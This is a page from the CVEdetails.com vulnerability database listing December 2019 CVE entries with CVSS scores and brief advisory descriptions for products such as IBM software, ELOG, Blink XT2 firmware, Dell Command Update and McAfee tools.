CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
  What's the CVSS score of your company?
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities Published In December 2019

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
1251 CVE-2019-4716 22 Exec Code Dir. Trav. 2019-12-18 2020-08-24
10.0
None Remote Low Not required Complete Complete Complete
IBM Planning Analytics 2.0.0 through 2.0.8 is vulnerable to a configuration overwrite that allows an unauthenticated user to login as "admin", and then execute code as root or SYSTEM via TM1 scripting. IBM X-Force ID: 172094.
1252 CVE-2019-4715 20 Exec Code 2019-12-11 2021-07-21
9.0
None Remote Low ??? Complete Complete Complete
IBM Spectrum Scale 4.2 and 5.0 could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 172093.
1253 CVE-2019-4665 79 XSS 2019-12-11 2019-12-12
3.5
None Remote Medium ??? None Partial None
IBM Spectrum Scale 4.2 and 5.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 171247.
1254 CVE-2019-4663 79 XSS 2019-12-10 2019-12-10
3.5
None Remote Medium ??? None Partial None
IBM WebSphere Application Server - Liberty is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 171245.
1255 CVE-2019-4655 20 DoS 2019-12-30 2021-07-21
4.0
None Remote Low ??? None None Partial
IBM MQ 9.1.0.0, 9.1.0.1, 9.1.0.2, 9.1.0.3, 9.1.1, 9.1.2, and 9.1.3 is vulnerable to a denial of service attack that would allow an authenticated user to reset client connections due to an error within the Data Conversion routine. IBM X-Force ID: 170966.
1256 CVE-2019-4623 79 XSS 2019-12-30 2020-01-03
3.5
None Remote Medium ??? None Partial None
IBM Cognos Analytics 11.0 and 11.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 168924.
1257 CVE-2019-4621 1188 2019-12-09 2019-12-17
6.8
None Remote Medium Not required Partial Partial Partial
IBM DataPower Gateway 7.6.0.0-7 throug 6.0.14 and 2018.4.1.0 through 2018.4.1.5 have a default administrator account that is enabled if the IPMI LAN channel is enabled. A remote attacker could use this account to gain unauthorised access to the BMC. IBM X-Force ID: 168883.
1258 CVE-2019-4612 434 2019-12-09 2019-12-11
6.5
None Remote Low ??? Partial Partial Partial
IBM Planning Analytics 2.0 is vulnerable to malicious file upload in the My Account Portal. Attackers can make use of this weakness and upload malicious executable files into the system and it can be sent to victim for performing further attacks. IBM X-Force ID: 168523.
1259 CVE-2019-4611 79 XSS 2019-12-09 2019-12-11
3.5
None Remote Medium ??? None Partial None
IBM Planning Analytics 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 168519.
1260 CVE-2019-4609 327 2019-12-18 2020-08-24
5.0
None Remote Low Not required Partial None None
IBM API Connect 2018.4.1.7 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 168510.
1261 CVE-2019-4606 426 Exec Code 2019-12-12 2019-12-16
6.9
None Local Medium Not required Complete Complete Complete
IBM DB2 High Performance Unload load for LUW 6.1 and 6.5 could allow a local attacker to execute arbitrary code on the system, caused by an untrusted search path vulnerability. By using a executable file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 168298.
1262 CVE-2019-4560 20 DoS 2019-12-16 2021-07-21
4.0
None Remote Low ??? None None Partial
IBM MQ and IBM MQ Appliance 9.1 CD, 9.1 LTS, 9.0 LTS, and 8.0 is vulnerable to a denial of service attack caused by channels processing poorly formatted messages. IBM X-Force ID: 166357.
1263 CVE-2019-4555 79 XSS 2019-12-20 2020-03-17
3.5
None Remote Medium ??? None Partial None
IBM Cognos Analytics 11.0 and 11.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 166204.
1264 CVE-2019-4521 1236 Exec Code 2019-12-10 2020-08-24
10.0
None Remote Low Not required Complete Complete Complete
Platform System Manager in IBM Cloud Pak System 2.3 is potentially vulnerable to CVS Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 165179.
1265 CVE-2019-4468 79 XSS 2019-12-03 2019-12-09
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 163777.
1266 CVE-2019-4467 79 XSS 2019-12-03 2019-12-09
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 163776.
1267 CVE-2019-4465 269 2019-12-03 2020-08-24
2.1
None Local Low Not required Partial None None
IBM Cloud Pak System 2.3 and 2.3.0.1 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 163774.
1268 CVE-2019-4444 200 +Info 2019-12-16 2020-08-24
2.1
None Local Low Not required Partial None None
IBM API Connect 2018.1 through 2018.4.1.7 Developer Portal's user registration page does not disable password autocomplete. An attacker with access to the browser instance and local system credentials can steal the credentials used for registration. IBM X-Force ID: 163453.
1269 CVE-2019-4428 79 XSS 2019-12-09 2019-12-11
3.5
None Remote Medium ??? None Partial None
IBM Watson Assistant for IBM Cloud Pak for Data 1.0.0 through 1.3.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162807.
1270 CVE-2019-4426 79 XSS 2019-12-13 2019-12-18
3.5
None Remote Medium ??? None Partial None
The Case Builder component shipped with 18.0.0.1 through 19.0.0.2 and IBM Case Manager 5.1.1 through 5.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162772.
1271 CVE-2019-4388 79 XSS 2019-12-18 2019-12-23
3.5
None Remote Medium ??? None Partial None
HCL AppScan Source 9.0.3.13 and earlier is susceptible to cross-site scripting (XSS) attacks by allowing users to embed arbitrary JavaScript code in the Web UI.
1272 CVE-2019-4343 863 2019-12-30 2020-08-24
4.0
None Remote Low ??? Partial None None
IBM Cognos Analytics 11.0 and 11.1 allows overly permissive cross-origin resource sharing which could allow an attacker to transfer private information. An attacker could exploit this vulnerability to access content that should be restricted. IBM X-Force ID: 161422.
1273 CVE-2019-4335 522 2019-12-30 2020-08-24
2.1
None Local Low Not required Partial None None
IBM Watson Studio Local 1.2.3 stores key files in the user's home directory which could be obtained by another local user. IBM X-Force ID: 161413.
1274 CVE-2019-4244 306 2019-12-10 2019-12-13
6.4
None Remote Low Not required Partial Partial None
IBM SmartCloud Analytics 1.3.1 through 1.3.5 could allow a remote attacker to gain unauthorized information and unrestricted control over Zookeeper installations due to missing authentication. IBM X-Force ID: 159518.
1275 CVE-2019-4231 352 CSRF 2019-12-20 2020-01-03
4.3
None Remote Medium Not required None Partial None
IBM Cognos Analytics 11.0 and 11.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 159356.
1276 CVE-2019-4226 79 XSS 2019-12-03 2019-12-11
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 159243.
1277 CVE-2019-4130 434 Exec Code 2019-12-03 2019-12-09
6.5
None Remote Low ??? Partial Partial Partial
IBM Cloud Pak System 2.3 and 2.3.0.1 could allow a remote attacker to upload arbitrary files, which could allow the attacker to execute arbitrary code on the vulnerable server. IBM X-Force ID: 158280.
1278 CVE-2019-4098 79 XSS 2019-12-03 2019-12-09
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158020.
1279 CVE-2019-4095 352 CSRF 2019-12-10 2019-12-13
4.3
None Remote Medium Not required None Partial None
IBM Cloud Pak System 2.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 158015.
1280 CVE-2019-3996 610 2019-12-17 2020-01-24
7.5
None Remote Low Not required Partial Partial Partial
ELOG 3.1.4-57bea22 and below can be used as an HTTP GET request proxy when unauthenticated remote attackers send crafted HTTP POST requests.
1281 CVE-2019-3995 476 DoS 2019-12-17 2020-01-24
5.0
None Remote Low Not required None None Partial
ELOG 3.1.4-57bea22 and below is affected by a denial of service vulnerability due to a NULL pointer dereference. A remote unauthenticated attacker can crash the ELOG server by sending a crafted HTTP GET request.
1282 CVE-2019-3994 416 DoS 2019-12-17 2020-01-24
5.0
None Remote Low Not required None None Partial
ELOG 3.1.4-57bea22 and below is affected by a denial of service vulnerability due to a use after free. A remote unauthenticated attacker can crash the ELOG server by sending multiple HTTP POST requests which causes the ELOG function retrieve_url() to use a freed variable.
1283 CVE-2019-3993 319 2019-12-17 2020-10-15
5.0
None Remote Low Not required Partial None None
ELOG 3.1.4-57bea22 and below is affected by an information disclosure vulnerability. A remote unauthenticated attacker can recover a user's password hash by sending a crafted HTTP POST request.
1284 CVE-2019-3992 319 2019-12-17 2020-10-15
5.0
None Remote Low Not required Partial None None
ELOG 3.1.4-57bea22 and below is affected by an information disclosure vulnerability. A remote unauthenticated attacker can access the server's configuration file by sending an HTTP GET request. Amongst the configuration data, the attacker may gain access to valid admin usernames and, in older versions of ELOG, passwords.
1285 CVE-2019-3990 269 Bypass +Info 2019-12-03 2020-08-24
4.0
None Remote Low ??? Partial None None
A User Enumeration flaw exists in Harbor. The issue is present in the "/users" API endpoint. This endpoint is supposed to be restricted to administrators. This restriction is able to be bypassed and information can be obtained about registered users can be obtained via the "search" functionality.
1286 CVE-2019-3989 78 Exec Code 2019-12-11 2019-12-13
9.3
None Remote Medium Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when retrieving internal network configuration data.
1287 CVE-2019-3988 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the devices wifi configuration via the bssid parameter.
1288 CVE-2019-3987 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the devices wifi configuration via the key parameter.
1289 CVE-2019-3986 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the devices wifi configuration via the encryption parameter.
1290 CVE-2019-3985 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the devices wifi configuration via the ssid parameter.
1291 CVE-2019-3984 78 Exec Code 2019-12-31 2020-08-24
10.0
None Remote Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when the device retrieves updates scripts from the internet.
1292 CVE-2019-3983 798 Exec Code 2019-12-11 2020-08-24
7.2
None Local Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary code and commands on the device due to insufficient UART protections.
1293 CVE-2019-3951 787 DoS Exec Code Overflow Mem. Corr. 2019-12-12 2019-12-18
7.5
None Remote Low Not required Partial Partial Partial
Advantech WebAccess before 8.4.3 allows unauthenticated remote attackers to execute arbitrary code or cause a denial of service (memory corruption) due to a stack-based buffer overflow when handling IOCTL 70533 RPC messages.
1294 CVE-2019-3750 59 2019-12-03 2019-12-10
3.6
None Local Low Not required None Partial Partial
Dell Command Update versions prior to 3.1 contain an Arbitrary File Deletion Vulnerability. A local authenticated malicious user with low privileges potentially could exploit this vulnerability to delete arbitrary files by creating a symlink from the "Temp\IC\ICDebugLog.txt" to any targeted file. This issue occurs because of insecure handling of Temp directory permissions that were set incorrectly.
1295 CVE-2019-3749 59 2019-12-03 2019-12-10
3.6
None Local Low Not required None Partial Partial
Dell Command Update versions prior to 3.1 contain an Arbitrary File Deletion Vulnerability. A local authenticated malicious user with low privileges potentially could exploit this vulnerability to delete arbitrary files by creating a symlink from the "Temp\ICProgress\Dell_InventoryCollector_Progress.xml" to any targeted file. This issue occurs because permissions on the Temp directory were set incorrectly.
1296 CVE-2019-3690 59 2019-12-05 2020-11-20
7.2
None Local Low Not required Complete Complete Complete
The chkstat tool in the permissions package followed symlinks before commit a9e1d26cd49ef9ee0c2060c859321128a6dd4230 (please also check the additional hardenings after this fix). This allowed local attackers with control over a path that is traversed by chkstat to escalate privileges.
1297 CVE-2019-3667 427 Exec Code 2019-12-11 2019-12-16
4.4
None Local Medium Not required Partial Partial Partial
DLL Search Order Hijacking vulnerability in the Microsoft Windows client in McAfee Tech Check 3.0.0.17 and earlier allows local users to execute arbitrary code via the local folder placed there by an attacker.
1298 CVE-2019-3666 2019-12-03 2019-12-12
4.3
None Remote Medium Not required None Partial None
API Abuse/Misuse vulnerability in the web interface in McAfee Web Advisor (WA) prior to 4.1.1.48 allows remote unauthenticated attacker to allow the browser to navigate to restricted websites via a carefully crafted web site.
1299 CVE-2019-3665 94 2019-12-03 2019-12-11
4.3
None Remote Medium Not required None Partial None
Code Injection vulnerability in the web interface in McAfee Web Advisor (WA) prior to 4.1.1.48 allows remote unauthenticated attacker to allow the browser to render a website which Web Advisor would normally have blocked via a carefully crafted web site.
1300 CVE-2019-3467 732 2019-12-23 2020-09-25
7.2
None Local Low Not required Complete Complete Complete
Debian-edu-config all versions < 2.11.10, a set of configuration files used for Debian Edu, and debian-lan-config < 0.26, configured too permissive ACLs for the Kerberos admin server, which allowed password changes for other Kerberos user principals.
Total number of vulnerabilities : 1577   Page : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 (This Page)27 28 29 30 31 32
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.